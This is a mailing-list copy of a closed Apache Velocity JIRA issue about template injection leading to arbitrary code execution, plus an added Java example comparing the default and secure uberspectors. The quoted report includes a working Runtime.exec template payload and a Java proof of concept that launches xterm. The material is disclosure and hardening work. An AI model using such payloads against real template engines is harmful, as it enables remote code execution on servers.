Posted to dev@velocity.apache.org by "Sergiu Dumitriu (JIRA)" <ji...@apache.org> on 2016/08/15 15:39:20 UTC
[jira] [Closed] (VELOCITY-877) Access to critical fields/methods allows execution of arbitrary code ('Template Injection')
[ https://issues.apache.org/jira/browse/VELOCITY-877?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Sergiu Dumitriu closed VELOCITY-877.
------------------------------------
Resolution: Not A Problem
Assignee: Sergiu Dumitriu
Yes, this is by design, **if** you are using the default uberspector. Velocity also comes with a secure uberspector, which is designed to prevent exactly this kind of security issue.
{noformat}
runtime.introspector.uberspect = org.apache.velocity.util.introspection.SecureUberspector
{noformat}
> Access to critical fields/methods allows execution of arbitrary code ('Template Injection')
> -------------------------------------------------------------------------------------------
>
> Key: VELOCITY-877
> URL: https://issues.apache.org/jira/browse/VELOCITY-877
> Project: Velocity
> Issue Type: Bug
> Components: Engine
> Affects Versions: 1.7
> Reporter: Markus Wulftange
> Assignee: Sergiu Dumitriu
> Priority: Critical
> Labels: security
>
> It is possible to reference certain fields/methods, which eventually allow the execution of arbitrary methods.
> For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of any variable, it is possible to get the variable's class object. This can be extended to get arbitrary class objects and execute arbitrary methods.
> For example, the following statement results in the execution of the '{{xterm}}':
> {code}
> $var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
> {code}
> As a standalone:
> {code:java}
> import java.io.StringWriter;
>
> import org.apache.velocity.VelocityContext;
> import org.apache.velocity.app.Velocity;
> import org.apache.velocity.context.Context;
>
> public class VelocityTest {
>     public static void main(String[] args) throws Exception {
>         Context context = new VelocityContext();
>         // Any ordinary object in the context is enough; here a plain String.
>         context.put("var", "foo");
>         // Attacker-controlled template text: walks from the String to its Class
>         // object, calls the static Class.forName(), and spawns 'xterm' via Runtime.exec().
>         String instring = "$var.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()";
>         // A real Writer avoids a NullPointerException when the rendered result is
>         // written out; the exec() has already happened by the time that write occurs.
>         StringWriter out = new StringWriter();
>         Velocity.evaluate(context, out, "templateName", instring);
>     }
> }
> {code}
> This issue has already been made public in the past by James Kettle in August 2015 (see http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity) and via CVE-2015-5603 (see https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly others.
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
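The following is an added example, not code from the JIRA issue or from the Velocity project, showing the default uberspector and the SecureUberspector setting from the closing comment side by side in one program. It applies the property programmatically through VelocityEngine.init(Properties) rather than via velocity.properties, and uses the reporter's gadget chain with a harmless static call (System.getProperty) in place of Runtime.exec(). The class name UberspectorComparison, the template text and the context value "foo" are choices made for this example; it assumes Velocity Engine 1.7 on the classpath.

```java
import java.io.StringWriter;
import java.util.Properties;

import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import org.apache.velocity.context.Context;

public class UberspectorComparison {

    // Same shape as the reported payload (String -> Class -> Class.forName()),
    // but the static method reached is System.getProperty(), not Runtime.exec().
    static final String TEMPLATE =
        "$var.class.forName('java.lang.System').getProperty('java.version')";

    // Render the template against a context holding one ordinary String.
    static String render(VelocityEngine engine, String template) throws Exception {
        Context context = new VelocityContext();
        context.put("var", "foo");
        StringWriter out = new StringWriter();
        engine.evaluate(context, out, "templateName", template);
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        // 1. Default uberspector: any public method reachable from a context
        //    object can be invoked, including Class.forName().
        VelocityEngine permissive = new VelocityEngine();
        permissive.init();
        System.out.println("default : " + render(permissive, TEMPLATE));

        // 2. The setting from the closing comment, supplied as a Properties
        //    entry instead of a velocity.properties line.
        Properties props = new Properties();
        props.setProperty("runtime.introspector.uberspect",
            "org.apache.velocity.util.introspection.SecureUberspector");
        VelocityEngine hardened = new VelocityEngine();
        hardened.init(props);
        System.out.println("secure  : " + render(hardened, TEMPLATE));
    }
}
```

With the default uberspector the first line prints the running JVM's java.version, i.e. the static call went through. With SecureUberspector the introspector refuses to look up forName on java.lang.Class (it is one of the classes the secure introspector disallows, alongside Runtime, System, Thread, ClassLoader and others, plus the java.lang.reflect package), the lookup is logged as refused, and under the default non-strict reference mode the unresolved reference is written out as the literal template text; with runtime.references.strict enabled the render fails with an exception instead. Two caveats worth knowing before relying on it: the secure introspector is a denylist of classes and packages rather than an allowlist, and it deliberately still permits Class.getName(), so $var.class.name on a String continues to render java.lang.String. It narrows the gadget surface, but untrusted template text remains a risk that is better removed at the design level.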